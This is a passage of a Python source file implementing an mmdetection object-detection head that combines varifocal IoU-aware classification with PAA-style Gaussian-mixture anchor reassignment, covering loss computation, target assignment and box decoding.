cls_score.permute(0, 2, 3,\n 1).reshape(-1,\n self.cls_out_channels).contiguous()\n for cls_score in cls_scores\n ]\n flatten_bbox_preds = [\n bbox_pred.permute(0, 2, 3, 1).reshape(-1, 4).contiguous()\n for bbox_pred in bbox_preds\n ]\n flatten_bbox_preds_refine = [\n bbox_pred_refine.permute(0, 2, 3, 1).reshape(-1, 4).contiguous()\n for bbox_pred_refine in bbox_preds_refine\n ]\n flatten_cls_scores = torch.cat(flatten_cls_scores)\n flatten_bbox_preds = torch.cat(flatten_bbox_preds)\n flatten_bbox_preds_refine = torch.cat(flatten_bbox_preds_refine)\n\n flatten_labels = torch.cat(labels)\n flatten_bbox_targets = torch.cat(bbox_targets)\n\n flatten_points = torch.cat([points.repeat(num_imgs, 1) for points in all_level_points])\n\n pos_inds = torch.where(\n ((flatten_labels >= 0) & (flatten_labels < bg_class_ind)) > 0)[0]\n\n num_pos = len(pos_inds)\n\n # FG cat_id: [0, num_classes - 1], BG cat_id: num_classes\n\n\n pos_bbox_preds = flatten_bbox_preds[pos_inds]\n pos_bbox_preds_refine = flatten_bbox_preds_refine[pos_inds]\n pos_labels = flatten_labels[pos_inds]\n\n # sync num_pos across all gpus\n if self.sync_num_pos:\n num_pos_avg_per_gpu = reduce_mean(\n pos_inds.new_tensor(num_pos).float()).item()\n num_pos_avg_per_gpu = max(num_pos_avg_per_gpu, 1.0)\n else:\n num_pos_avg_per_gpu = num_pos\n\n\n\n if num_pos > 0:\n pos_bbox_targets = flatten_bbox_targets[pos_inds]\n pos_points = flatten_points[pos_inds]\n\n pos_decoded_bbox_preds = distance2bbox(pos_points, pos_bbox_preds)\n pos_decoded_target_preds = distance2bbox(pos_points,\n pos_bbox_targets)\n iou_targets_ini = bbox_overlaps(\n pos_decoded_bbox_preds,\n pos_decoded_target_preds.detach(),\n is_aligned=True).clamp(min=1e-6)\n bbox_weights_ini = iou_targets_ini.clone().detach()\n iou_targets_ini_avg_per_gpu = reduce_mean(\n 
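# reduce_mean averages this normalizer over all GPUs so every rank uses the same loss scale\n 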
bbox_weights_ini.sum()).item()\n\n bbox_avg_factor_ini = max(iou_targets_ini_avg_per_gpu, 1.0)\n # print(\"loss_bbox start\")\n loss_bbox = self.loss_bbox(\n pos_decoded_bbox_preds,\n pos_decoded_target_preds.detach(),\n weight=bbox_weights_ini,\n avg_factor=bbox_avg_factor_ini)\n # print(\"loss_bbox end\")\n pos_decoded_bbox_preds_refine = \\\n distance2bbox(pos_points, pos_bbox_preds_refine)\n iou_targets_rf = bbox_overlaps(\n pos_decoded_bbox_preds_refine,\n pos_decoded_target_preds.detach(),\n is_aligned=True).clamp(min=1e-6)\n bbox_weights_rf = iou_targets_rf.clone().detach()\n iou_targets_rf_avg_per_gpu = reduce_mean(\n bbox_weights_rf.sum()).item()\n bbox_avg_factor_rf = max(iou_targets_rf_avg_per_gpu, 1.0)\n # print(\"loss_bbox_refine start\")\n loss_bbox_refine = self.loss_bbox_refine(\n pos_decoded_bbox_preds_refine,\n pos_decoded_target_preds.detach(),\n weight=bbox_weights_rf,\n avg_factor=bbox_avg_factor_rf)\n # print(\"loss_bbox_refine end\")\n # build IoU-aware cls_score targets\n if self.use_vfl:\n pos_ious = iou_targets_rf.clone().detach()\n cls_iou_targets = torch.zeros_like(flatten_cls_scores)\n cls_iou_targets[pos_inds, pos_labels] = pos_ious\n else:\n loss_bbox = pos_bbox_preds.sum() * 0\n loss_bbox_refine = pos_bbox_preds_refine.sum() * 0\n if self.use_vfl:\n cls_iou_targets = torch.zeros_like(flatten_cls_scores)\n\n if self.use_vfl:\n loss_cls = self.loss_cls(\n flatten_cls_scores,\n cls_iou_targets,\n avg_factor=num_pos_avg_per_gpu)\n else:\n try:\n label_weights = torch.cat(label_weights)\n except:\n pass\n # print(\"cls loss start\")\n loss_cls = self.loss_cls(\n flatten_cls_scores,\n flatten_labels,\n weight=label_weights,\n avg_factor=num_pos_avg_per_gpu)\n # print(\"cls loss end\")\n\n label_weights = torch.cat(label_weights)\n loss_focal = self.paa_assign_cls_loss(\n flatten_cls_scores,\n flatten_labels,\n weight=label_weights,\n avg_factor=num_pos_avg_per_gpu)\n\n\n return dict(\n loss_cls=loss_cls,\n loss_bbox=loss_bbox,\n loss_bbox_rf=loss_bbox_refine,\n loss_focal=loss_focal)\n\n @force_fp32(apply_to=('cls_scores', 'bbox_preds', 'bbox_preds_refine'))\n def get_bboxes(self,\n cls_scores,\n bbox_preds,\n bbox_preds_refine,\n img_metas,\n cfg=None,\n rescale=None,\n with_nms=True):\n \"\"\"Transform network outputs for a batch into bbox predictions.\n Args:\n cls_scores (list[Tensor]): Box iou-aware scores for each scale\n level with shape (N, num_points * num_classes, H, W).\n bbox_preds (list[Tensor]): Box offsets for each scale\n level with shape (N, num_points * 4, H, W).\n bbox_preds_refine (list[Tensor]): Refined Box offsets for\n each scale level with shape (N, num_points * 4, H, W).\n img_metas (list[dict]): Meta information of each image, e.g.,\n image size, scaling factor, etc.\n cfg (mmcv.Config): Test / postprocessing configuration,\n if None, test_cfg would be used. Default: None.\n rescale (bool): If True, return boxes in original image space.\n Default: False.\n with_nms (bool): If True, do nms before returning boxes.\n Default: True.\n Returns:\n list[tuple[Tensor, Tensor]]: Each item in result_list is 2-tuple.\n The first item is an (n, 5) tensor, where the first 4 columns\n are bounding box positions (tl_x, tl_y, br_x, br_y) and the\n 5-th column is a score between 0 and 1. 
The second item is a\n (n,) tensor where each item is the predicted class label of\n the corresponding box.\n \"\"\"\n assert len(cls_scores) == len(bbox_preds) == len(bbox_preds_refine)\n num_levels = len(cls_scores)\n\n featmap_sizes = [featmap.size()[-2:] for featmap in cls_scores]\n mlvl_points = self.get_points(featmap_sizes, bbox_preds[0].dtype,\n bbox_preds[0].device)\n result_list = []\n for img_id in range(len(img_metas)):\n cls_score_list = [\n cls_scores[i][img_id].detach() for i in range(num_levels)\n ]\n bbox_pred_list = [\n bbox_preds_refine[i][img_id].detach()\n for i in range(num_levels)\n ]\n img_shape = img_metas[img_id]['img_shape']\n scale_factor = img_metas[img_id]['scale_factor']\n det_bboxes = self._get_bboxes_single(cls_score_list,\n bbox_pred_list, mlvl_points,\n img_shape, scale_factor, cfg,\n rescale, with_nms)\n result_list.append(det_bboxes)\n return result_list\n\n def _get_bboxes_single(self,\n cls_scores,\n bbox_preds,\n mlvl_points,\n img_shape,\n scale_factor,\n cfg,\n rescale=False,\n with_nms=True):\n \"\"\"Transform outputs for a single batch item into bbox predictions.\n Args:\n cls_scores (list[Tensor]): Box iou-aware scores for a single scale\n level with shape (num_points * num_classes, H, W).\n bbox_preds (list[Tensor]): Box offsets for a single scale\n level with shape (num_points * 4, H, W).\n mlvl_points (list[Tensor]): Box reference for a single scale level\n with shape (num_total_points, 4).\n img_shape (tuple[int]): Shape of the input image,\n (height, width, 3).\n scale_factor (ndarray): Scale factor of the image arrange as\n (w_scale, h_scale, w_scale, h_scale).\n cfg (mmcv.Config | None): Test / postprocessing configuration,\n if None, test_cfg would be used.\n rescale (bool): If True, return boxes in original image space.\n Default: False.\n with_nms (bool): If True, do nms before returning boxes.\n Default: True.\n Returns:\n tuple(Tensor):\n det_bboxes (Tensor): BBox predictions in shape (n, 5), where\n the first 4 columns are bounding box positions\n (tl_x, tl_y, br_x, br_y) and the 5-th column is a score\n between 0 and 1.\n det_labels (Tensor): A (n,) tensor where each item is the\n predicted class label of the corresponding box.\n \"\"\"\n cfg = self.test_cfg if cfg is None else cfg\n assert len(cls_scores) == len(bbox_preds) == len(mlvl_points)\n mlvl_bboxes = []\n mlvl_scores = []\n for cls_score, bbox_pred, points in zip(cls_scores, bbox_preds,\n mlvl_points):\n assert cls_score.size()[-2:] == bbox_pred.size()[-2:]\n scores = cls_score.permute(1, 2, 0).reshape(\n -1, self.cls_out_channels).contiguous().sigmoid()\n bbox_pred = bbox_pred.permute(1, 2, 0).reshape(-1, 4).contiguous()\n\n nms_pre = cfg.get('nms_pre', -1)\n if 0 < nms_pre < scores.shape[0]:\n max_scores, _ = scores.max(dim=1)\n _, topk_inds = max_scores.topk(nms_pre)\n points = points[topk_inds, :]\n bbox_pred = bbox_pred[topk_inds, :]\n scores = scores[topk_inds, :]\n bboxes = distance2bbox(points, bbox_pred, max_shape=img_shape)\n mlvl_bboxes.append(bboxes)\n mlvl_scores.append(scores)\n mlvl_bboxes = torch.cat(mlvl_bboxes)\n if rescale:\n mlvl_bboxes /= mlvl_bboxes.new_tensor(scale_factor)\n mlvl_scores = torch.cat(mlvl_scores)\n padding = mlvl_scores.new_zeros(mlvl_scores.shape[0], 1)\n # remind that we set FG labels to [0, num_class-1] since mmdet v2.0\n # BG cat_id: num_class\n mlvl_scores = torch.cat([mlvl_scores, padding], dim=1)\n if with_nms:\n det_bboxes, det_labels = multiclass_nms(mlvl_bboxes, mlvl_scores,\n cfg.score_thr, cfg.nms,\n cfg.max_per_img)\n 
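# det_bboxes: (n, 5) boxes with a trailing score column; det_labels: (n,) class indices\n 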
return det_bboxes, det_labels\n else:\n return mlvl_bboxes, mlvl_scores\n\n def _get_points_single(self,\n featmap_size,\n stride,\n dtype,\n device,\n flatten=False):\n \"\"\"Get points according to feature map sizes.\"\"\"\n h, w = featmap_size\n x_range = torch.arange(\n 0, w * stride, stride, dtype=dtype, device=device)\n y_range = torch.arange(\n 0, h * stride, stride, dtype=dtype, device=device)\n y, x = torch.meshgrid(y_range, x_range)\n # to be compatible with anchor points in ATSS\n if self.assign_type == 'atss' or self.assign_type == 'paa':\n points = torch.stack(\n (x.reshape(-1), y.reshape(-1)), dim=-1) + \\\n stride * self.anchor_center_offset\n else:\n points = torch.stack(\n (x.reshape(-1), y.reshape(-1)), dim=-1) + stride // 2\n return points\n\n def get_targets(self, cls_scores, mlvl_points, gt_bboxes, gt_labels,\n img_metas, gt_bboxes_ignore):\n \"\"\"A wrapper for computing ATSS and FCOS targets for points in multiple\n images.\n Args:\n cls_scores (list[Tensor]): Box iou-aware scores for each scale\n level with shape (N, num_points * num_classes, H, W).\n mlvl_points (list[Tensor]): Points of each fpn level, each has\n shape (num_points, 2).\n gt_bboxes (list[Tensor]): Ground truth bboxes of each image,\n each has shape (num_gt, 4).\n gt_labels (list[Tensor]): Ground truth labels of each box,\n each has shape (num_gt,).\n img_metas (list[dict]): Meta information of each image, e.g.,\n image size, scaling factor, etc.\n gt_bboxes_ignore (None | Tensor): Ground truth bboxes to be\n ignored, shape (num_ignored_gts, 4).\n Returns:\n tuple:\n labels_list (list[Tensor]): Labels of each level.\n label_weights (Tensor/None): Label weights of all levels.\n bbox_targets_list (list[Tensor]): Regression targets of each\n level, (l, t, r, b).\n bbox_weights (Tensor/None): Bbox weights of all levels.\n \"\"\"\n if self.assign_type == \"atss\":\n return self.get_atss_targets(cls_scores, mlvl_points, gt_bboxes,\n gt_labels, img_metas,\n gt_bboxes_ignore)\n elif self.assign_type == \"paa\":\n return self.get_paa_targets(cls_scores, mlvl_points, gt_bboxes,\n gt_labels, img_metas,\n gt_bboxes_ignore)\n else:\n self.norm_on_bbox = False\n return self.get_fcos_targets(mlvl_points, gt_bboxes, gt_labels)\n\n def _get_target_single(self, *args, **kwargs):\n \"\"\"Avoid ambiguity in multiple inheritance.\"\"\"\n if self.assign_type == \"atss\":\n return ATSSHead._get_target_single(self, *args, **kwargs)\n if self.assign_type == \"paa\":\n return PAA_ATSSHead._get_target_single(self, *args, **kwargs)\n else:\n return FCOSHead._get_target_single(self, *args, **kwargs)\n\n def get_fcos_targets(self, points, gt_bboxes_list, gt_labels_list):\n \"\"\"Compute FCOS regression and classification targets for points in\n multiple images.\n Args:\n points (list[Tensor]): Points of each fpn level, each has shape\n (num_points, 2).\n gt_bboxes_list (list[Tensor]): Ground truth bboxes of each image,\n each has shape (num_gt, 4).\n gt_labels_list (list[Tensor]): Ground truth labels of each box,\n each has shape (num_gt,).\n Returns:\n tuple:\n labels (list[Tensor]): Labels of each level.\n label_weights: None, to be compatible with ATSS targets.\n bbox_targets (list[Tensor]): BBox targets of each level.\n bbox_weights: None, to be compatible with ATSS targets.\n \"\"\"\n labels, bbox_targets = FCOSHead.get_targets(self, points,\n gt_bboxes_list,\n gt_labels_list)\n label_weights = None\n bbox_weights = None\n return labels, label_weights, bbox_targets, bbox_weights\n\n def get_atss_targets(self,\n 
cls_scores,\n mlvl_points,\n gt_bboxes,\n gt_labels,\n img_metas,\n gt_bboxes_ignore=None):\n \"\"\"A wrapper for computing ATSS targets for points in multiple images.\n Args:\n cls_scores (list[Tensor]): Box iou-aware scores for each scale\n level with shape (N, num_points * num_classes, H, W).\n mlvl_points (list[Tensor]): Points of each fpn level, each has\n shape (num_points, 2).\n gt_bboxes (list[Tensor]): Ground truth bboxes of each image,\n each has shape (num_gt, 4).\n gt_labels (list[Tensor]): Ground truth labels of each box,\n each has shape (num_gt,).\n img_metas (list[dict]): Meta information of each image, e.g.,\n image size, scaling factor, etc.\n gt_bboxes_ignore (None | Tensor): Ground truth bboxes to be\n ignored, shape (num_ignored_gts, 4). Default: None.\n Returns:\n tuple:\n labels_list (list[Tensor]): Labels of each level.\n label_weights (Tensor): Label weights of all levels.\n bbox_targets_list (list[Tensor]): Regression targets of each\n level, (l, t, r, b).\n bbox_weights (Tensor): Bbox weights of all levels.\n \"\"\"\n featmap_sizes = [featmap.size()[-2:] for featmap in cls_scores]\n assert len(featmap_sizes) == self.anchor_generator.num_levels\n\n device = cls_scores[0].device\n anchor_list, valid_flag_list = self.get_anchors(\n featmap_sizes, img_metas, device=device)\n label_channels = self.cls_out_channels if self.use_sigmoid_cls else 1\n\n cls_reg_targets = ATSSHead.get_targets(\n self,\n anchor_list,\n valid_flag_list,\n gt_bboxes,\n img_metas,\n gt_bboxes_ignore_list=gt_bboxes_ignore,\n gt_labels_list=gt_labels,\n label_channels=label_channels,\n unmap_outputs=True)\n if cls_reg_targets is None:\n return None\n\n (anchor_list, labels_list, label_weights_list, bbox_targets_list,\n bbox_weights_list, num_total_pos, num_total_neg) = cls_reg_targets\n\n bbox_targets_list = [\n bbox_targets.reshape(-1, 4) for bbox_targets in bbox_targets_list\n ]\n\n num_imgs = len(img_metas)\n # transform bbox_targets (x1, y1, x2, y2) into (l, t, r, b) format\n bbox_targets_list = self.transform_bbox_targets(\n bbox_targets_list, mlvl_points, num_imgs)\n\n labels_list = [labels.reshape(-1) for labels in labels_list]\n label_weights_list = [\n label_weights.reshape(-1) for label_weights in label_weights_list\n ]\n bbox_weights_list = [\n bbox_weights.reshape(-1) for bbox_weights in bbox_weights_list\n ]\n label_weights = torch.cat(label_weights_list)\n bbox_weights = torch.cat(bbox_weights_list)\n return labels_list, label_weights, bbox_targets_list, bbox_weights\n\n def get_paa_targets(self,\n cls_scores,\n mlvl_points,\n gt_bboxes,\n gt_labels,\n img_metas,\n gt_bboxes_ignore=None):\n \"\"\"A wrapper for computing ATSS targets for points in multiple images.\n Args:\n cls_scores (list[Tensor]): Box iou-aware scores for each scale\n level with shape (N, num_points * num_classes, H, W).\n mlvl_points (list[Tensor]): Points of each fpn level, each has\n shape (num_points, 2).\n gt_bboxes (list[Tensor]): Ground truth bboxes of each image,\n each has shape (num_gt, 4).\n gt_labels (list[Tensor]): Ground truth labels of each box,\n each has shape (num_gt,).\n img_metas (list[dict]): Meta information of each image, e.g.,\n image size, scaling factor, etc.\n gt_bboxes_ignore (None | Tensor): Ground truth bboxes to be\n ignored, shape (num_ignored_gts, 4). 
Default: None.\n Returns:\n tuple:\n labels_list (list[Tensor]): Labels of each level.\n label_weights (Tensor): Label weights of all levels.\n bbox_targets_list (list[Tensor]): Regression targets of each\n level, (l, t, r, b).\n bbox_weights (Tensor): Bbox weights of all levels.\n \"\"\"\n featmap_sizes = [featmap.size()[-2:] for featmap in cls_scores]\n assert len(featmap_sizes) == self.anchor_generator.num_levels\n\n device = cls_scores[0].device\n anchor_list, valid_flag_list = self.get_anchors(\n featmap_sizes, img_metas, device=device)\n label_channels = self.cls_out_channels if self.use_sigmoid_cls else 1\n\n cls_reg_targets = PAA_ATSSHead.get_targets(\n self,\n anchor_list,\n valid_flag_list,\n gt_bboxes,\n img_metas,\n gt_bboxes_ignore_list=gt_bboxes_ignore,\n gt_labels_list=gt_labels,\n label_channels=label_channels,\n unmap_outputs=True)\n if cls_reg_targets is None:\n return None\n\n (labels_list, label_weights_list, bbox_targets_list, bbox_weights_list,\n pos_inds, pos_gt_index) = cls_reg_targets\n\n bbox_targets_list = [\n bbox_targets.reshape(-1, 4) for bbox_targets in bbox_targets_list\n ]\n\n num_imgs = len(img_metas)\n # transform bbox_targets (x1, y1, x2, y2) into (l, t, r, b) format\n mlvl_points = torch.cat(mlvl_points)\n bbox_targets_list = self.transform_paa_bbox_targets(bbox_targets_list, mlvl_points)\n\n labels_list = [labels.reshape(-1) for labels in labels_list]\n label_weights_list = [\n label_weights.reshape(-1) for label_weights in label_weights_list\n ]\n bbox_weights_list = [\n bbox_weights.reshape(-1) for bbox_weights in bbox_weights_list\n ]\n # label_weights = torch.cat(label_weights_list)\n # bbox_weights = torch.cat(bbox_weights_list)\n return labels_list, label_weights_list, bbox_targets_list, bbox_weights_list, pos_inds, pos_gt_index\n\n def transform_paa_bbox_targets(self, decoded_bboxes, mlvl_points):\n \"\"\"Transform bbox_targets (x1, y1, x2, y2) into (l, t, r, b) format.\n Args:\n decoded_bboxes (list[Tensor]): Regression targets of each level,\n in the form of (x1, y1, x2, y2).\n mlvl_points (list[Tensor]): Points of each fpn level, each has\n shape (num_points, 2).\n num_imgs (int): the number of images in a batch.\n Returns:\n bbox_targets (list[Tensor]): Regression targets of each level in\n the form of (l, t, r, b).\n \"\"\"\n # TODO: Re-implemented in Class PointCoder\n num_images = len(decoded_bboxes)\n bbox_targets = []\n assert len(decoded_bboxes[0]) == len(mlvl_points)\n\n for i in range(num_images):\n bbox_target = bbox2distance(mlvl_points, decoded_bboxes[i])\n bbox_targets.append(bbox_target)\n\n return bbox_targets\n\n def transform_bbox_targets(self, decoded_bboxes, mlvl_points, num_imgs):\n \"\"\"Transform bbox_targets (x1, y1, x2, y2) into (l, t, r, b) format.\n Args:\n decoded_bboxes (list[Tensor]): Regression targets of each level,\n in the form of (x1, y1, x2, y2).\n mlvl_points (list[Tensor]): Points of each fpn level, each has\n shape (num_points, 2).\n num_imgs (int): the number of images in a batch.\n Returns:\n bbox_targets (list[Tensor]): Regression targets of each level in\n the form of (l, t, r, b).\n \"\"\"\n # TODO: Re-implemented in Class PointCoder\n assert len(decoded_bboxes) == len(mlvl_points)\n num_levels = len(decoded_bboxes)\n mlvl_points = [points.repeat(num_imgs, 1) for points in mlvl_points]\n bbox_targets = []\n for i in range(num_levels):\n bbox_target = bbox2distance(mlvl_points[i], decoded_bboxes[i])\n bbox_targets.append(bbox_target)\n\n return bbox_targets\n\n def get_pos_loss(self,\n cls_scores, 
bbox_preds, bbox_preds_refine,\n labels, label_weights,\n bbox_targets, bbox_weights,\n all_level_points,\n pos_inds):\n \"\"\"Calculate loss of all potential positive samples obtained from first\n match process.\n Args:\n anchors (list[Tensor]): Anchors of each scale.\n cls_score (Tensor): Box scores of single image with shape\n (num_anchors, num_classes)\n bbox_pred (Tensor): Box energies / deltas of single image\n with shape (num_anchors, 4)\n label (Tensor): classification target of each anchor with\n shape (num_anchors,)\n label_weight (Tensor): Classification loss weight of each\n anchor with shape (num_anchors).\n bbox_target (dict): Regression target of each anchor with\n shape (num_anchors, 4).\n bbox_weight (Tensor): Bbox weight of each anchor with shape\n (num_anchors, 4).\n pos_inds (Tensor): Index of all positive samples got from\n first assign process.\n Returns:\n Tensor: Losses of all positive samples in single image.\n \"\"\"\n num_pos = len(pos_inds)\n\n if self.sync_num_pos:\n num_pos_avg_per_gpu = reduce_mean(\n pos_inds.new_tensor(num_pos).float()).item()\n num_pos_avg_per_gpu = max(num_pos_avg_per_gpu, 1.0)\n else:\n num_pos_avg_per_gpu = num_pos\n\n # flatten_cls_scores = cls_scores.detach()\n # flatten_bbox_preds = bbox_preds.detach()\n # flatten_bbox_preds_refine = bbox_preds_refine.detach()\n #\n # flatten_labels = labels.detach()\n # flatten_labels_weights = label_weights.detach()\n # flatten_bbox_targets = bbox_targets.detach()\n # flatten_points = all_level_points.detach()\n\n pos_bbox_preds = bbox_preds[pos_inds]\n pos_bbox_preds_refine = bbox_preds_refine[pos_inds]\n\n pos_labels = labels[pos_inds]\n pos_bbox_targets = bbox_targets[pos_inds]\n pos_points = all_level_points[pos_inds]\n pos_scores = cls_scores[pos_inds]\n pos_labels_weight = label_weights[pos_inds]\n\n if not num_pos:\n return cls_scores.new([]),\n\n pos_decoded_bbox_preds = distance2bbox(pos_points, pos_bbox_preds)\n pos_decoded_target_preds = distance2bbox(pos_points, pos_bbox_targets)\n iou_targets_ini = bbox_overlaps(\n pos_decoded_bbox_preds,\n pos_decoded_target_preds.detach(),\n is_aligned=True).clamp(min=1e-6)\n bbox_weights_ini = iou_targets_ini.clone().detach()\n # iou_targets_ini_avg_per_gpu = reduce_mean(\n # bbox_weights_ini.sum()).item()\n # bbox_avg_factor_ini = max(iou_targets_ini_avg_per_gpu, 1.0)\n bbox_avg_factor_ini = max(bbox_weights_ini.sum().item(), 1.0)\n\n loss_bbox = self.loss_bbox(\n pos_decoded_bbox_preds,\n pos_decoded_target_preds.detach(),\n weight=bbox_weights_ini,\n avg_factor=bbox_avg_factor_ini,\n reduction_override='none')\n\n pos_decoded_bbox_preds_refine = \\\n distance2bbox(pos_points, pos_bbox_preds_refine)\n iou_targets_rf = bbox_overlaps(\n pos_decoded_bbox_preds_refine,\n pos_decoded_target_preds.detach(),\n is_aligned=True).clamp(min=1e-6)\n bbox_weights_rf = iou_targets_rf.clone().detach()\n # iou_targets_rf_avg_per_gpu = reduce_mean(\n # bbox_weights_rf.sum()).item()\n iou_targets_rf_avg_per_gpu = bbox_weights_rf.sum().item()\n bbox_avg_factor_rf = max(iou_targets_rf_avg_per_gpu, 1.0)\n\n loss_bbox_refine = self.loss_bbox_refine(\n pos_decoded_bbox_preds_refine,\n pos_decoded_target_preds.detach(),\n weight=bbox_weights_rf,\n avg_factor=bbox_avg_factor_rf,\n reduction_override='none')\n\n # build IoU-aware cls_score targets\n if self.use_vfl:\n pos_ious = iou_targets_rf.clone().detach()\n cls_iou_targets = torch.zeros_like(cls_scores)\n cls_iou_targets[pos_inds, pos_labels] = pos_ious\n\n # if self.use_vfl:\n # target_iou = 
torch.zeros_like(pos_scores)\n # target_iou[:, pos_labels] = pos_ious\n # loss_cls = self.loss_cls(\n # pos_scores,\n # target_iou,\n # avg_factor=num_pos_avg_per_gpu,\n # reduction_override='none')\n # else:\n loss_cls = self.paa_assign_cls_loss(\n pos_scores,\n pos_labels,\n weight=pos_labels_weight,\n avg_factor=num_pos_avg_per_gpu,\n reduction_override='none')\n\n # loss_cls = loss_cls.sum(-1)\n pos_loss = loss_bbox + loss_bbox_refine + loss_cls.sum(-1)\n return pos_loss,\n # return 0,\n\n def paa_reassign(self, pos_losses, label, label_weight, bbox_weight,\n pos_inds, pos_gt_inds, anchors):\n \"\"\"Fit loss to GMM distribution and separate positive, ignore, negative\n samples again with GMM model.\n Args:\n pos_losses (Tensor): Losses of all positive samples in\n single image.\n label (Tensor): classification target of each anchor with\n shape (num_anchors,)\n label_weight (Tensor): Classification loss weight of each\n anchor with shape (num_anchors).\n bbox_weight (Tensor): Bbox weight of each anchor with shape\n (num_anchors, 4).\n pos_inds (Tensor): Index of all positive samples got from\n first assign process.\n pos_gt_inds (Tensor): Gt_index of all positive samples got\n from first assign process.\n anchors (list[Tensor]): Anchors of each scale.\n Returns:\n tuple: Usually returns a tuple containing learning targets.\n - label (Tensor): classification target of each anchor after\n paa assign, with shape (num_anchors,)\n - label_weight (Tensor): Classification loss weight of each\n anchor after paa assign, with shape (num_anchors).\n - bbox_weight (Tensor): Bbox weight of each anchor with shape\n (num_anchors, 4).\n - num_pos (int): The number of positive samples after paa\n assign.\n \"\"\"\n if not len(pos_inds):\n return label, label_weight, bbox_weight, 0\n\n num_gt = pos_gt_inds.max() + 1\n num_level = len(anchors)\n num_anchors_each_level = [item.size(0) for item in anchors]\n num_anchors_each_level.insert(0, 0)\n inds_level_interval = np.cumsum(num_anchors_each_level)\n pos_level_mask = []\n for i in range(num_level):\n mask = (pos_inds >= inds_level_interval[i]) & (\n pos_inds < inds_level_interval[i + 1]) # split the valid pos_inds per level: same shape, True/False marks the inds assigned to level i\n pos_level_mask.append(mask)\n pos_inds_after_paa = [label.new_tensor([])] # stores the pos_inds kept after reassignment\n ignore_inds_after_paa = [label.new_tensor([])]\n for gt_ind in range(num_gt):\n pos_inds_gmm = []\n pos_loss_gmm = []\n gt_mask = pos_gt_inds == gt_ind # mask of the candidates matched to this gt, handled one gt at a time\n for level in range(num_level):\n level_mask = pos_level_mask[level]\n level_gt_mask = level_mask & gt_mask # positions belonging to the current level and the current gt\n value, topk_inds = pos_losses[level_gt_mask].topk(\n min(level_gt_mask.sum(), self.topk), largest=False)\n pos_inds_gmm.append(pos_inds[level_gt_mask][topk_inds]) # keep the pos_inds with the smallest losses (topk with largest=False)\n pos_loss_gmm.append(value)\n pos_inds_gmm = torch.cat(pos_inds_gmm)\n pos_loss_gmm = torch.cat(pos_loss_gmm)\n # GMM needs at least two samples to fit\n if len(pos_inds_gmm) < 2:\n continue\n device = pos_inds_gmm.device\n pos_loss_gmm, sort_inds = pos_loss_gmm.sort()\n pos_inds_gmm = pos_inds_gmm[sort_inds]\n pos_loss_gmm = pos_loss_gmm.view(-1, 1).cpu().numpy()\n min_loss, max_loss = pos_loss_gmm.min(), pos_loss_gmm.max()\n means_init = np.array([min_loss, max_loss]).reshape(2, 1)\n weights_init = np.array([0.5, 0.5])\n precisions_init = np.array([1.0, 1.0]).reshape(2, 1, 1) # full\n # if self.covariance_type == 'spherical':\n # precisions_init = precisions_init.reshape(2)\n # elif self.covariance_type == 'diag':\n # 
precisions_init = precisions_init.reshape(2, 1)\n # elif self.covariance_type == 'tied':\n # precisions_init = np.array([[1.0]])\n # if skm is None:\n # raise ImportError('Please run \"pip install sklearn\" '\n # 'to install sklearn first.')\n # gmm = skm.GaussianMixture(\n # 2,\n # weights_init=weights_init,\n # means_init=means_init,\n # precisions_init=precisions_init,\n # covariance_type=self.covariance_type)\n gmm = skm.GaussianMixture(\n 2,\n weights_init=weights_init,\n means_init=means_init,\n precisions_init=precisions_init,\n covariance_type='full')\n gmm.fit(pos_loss_gmm)\n gmm_assignment = gmm.predict(pos_loss_gmm)\n scores = gmm.score_samples(pos_loss_gmm)\n gmm_assignment = torch.from_numpy(gmm_assignment).to(device)\n scores = torch.from_numpy(scores).to(device)\n pos_inds_temp, ignore_inds_temp = self.gmm_separation_scheme(\n gmm_assignment, scores, pos_inds_gmm) # ignore_inds_temp always comes back empty? component 0 of the GMM is the positive one, so this step effectively filters the positives\n pos_inds_after_paa.append(pos_inds_temp)\n ignore_inds_after_paa.append(ignore_inds_temp)\n pos_inds_after_paa = torch.cat(pos_inds_after_paa)\n ignore_inds_after_paa = torch.cat(ignore_inds_after_paa)\n reassign_mask = (pos_inds.unsqueeze(1) != pos_inds_after_paa).all(1)\n reassign_ids = pos_inds[reassign_mask] # ids that need to be reassigned (demoted to background)\n label[reassign_ids] = self.num_classes\n label_weight[ignore_inds_after_paa] = 0\n bbox_weight[reassign_ids] = 0\n num_pos = len(pos_inds_after_paa)\n return label, label_weight, bbox_weight, num_pos\n\n def gmm_separation_scheme(self, gmm_assignment, scores, pos_inds_gmm):\n \"\"\"A general separation scheme for gmm model.\n It separates a GMM distribution of candidate samples into three\n parts, 0, 1 and uncertain areas, and you can implement other\n separation schemes by rewriting this function.\n Args:\n gmm_assignment (Tensor): The prediction of GMM which is of shape\n (num_samples,). The 0/1 value indicates the distribution\n that each sample comes from.\n scores (Tensor): The probability of sample coming from the\n fit GMM distribution. The tensor is of shape (num_samples,).\n pos_inds_gmm (Tensor): All the indexes of samples which are used\n to fit GMM model. 
The tensor is of shape (num_samples,)\n Returns:\n tuple[Tensor]: The indices of positive and ignored samples.\n - pos_inds_temp (Tensor): Indices of positive samples.\n - ignore_inds_temp (Tensor): Indices of ignore samples.\n \"\"\"\n # The implementation is (c) in Fig.3 of the original paper instead of (b).\n # You can refer to issues such as\n # https://github.com/kkhoot/PAA/issues/8 and\n # https://github.com/kkhoot/PAA/issues/9.\n fgs = gmm_assignment == 0\n pos_inds_temp = fgs.new_tensor([], dtype=torch.long)\n ignore_inds_temp = fgs.new_tensor([], dtype=torch.long)\n if fgs.nonzero().numel():\n _, pos_thr_ind = scores[fgs].topk(1)\n pos_inds_temp = pos_inds_gmm[fgs][:pos_thr_ind + 1]\n ignore_inds_temp = pos_inds_gmm.new_tensor([])\n return pos_inds_temp, ignore_inds_temp\n\n\n\n def _load_from_state_dict(self, state_dict, prefix, local_metadata, strict,\n missing_keys, unexpected_keys, error_msgs):\n \"\"\"Override the method in the parent class to avoid changing parameters'\n names.\"\"\"\n pass","repo_name":"HAOCHENYE/yehc_mmdet","sub_path":"mmdet/models/dense_heads/vfocal_paa_private_head.py","file_name":"vfocal_paa_private_head.py","file_ext":"py","file_size_in_byte":57398,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"}
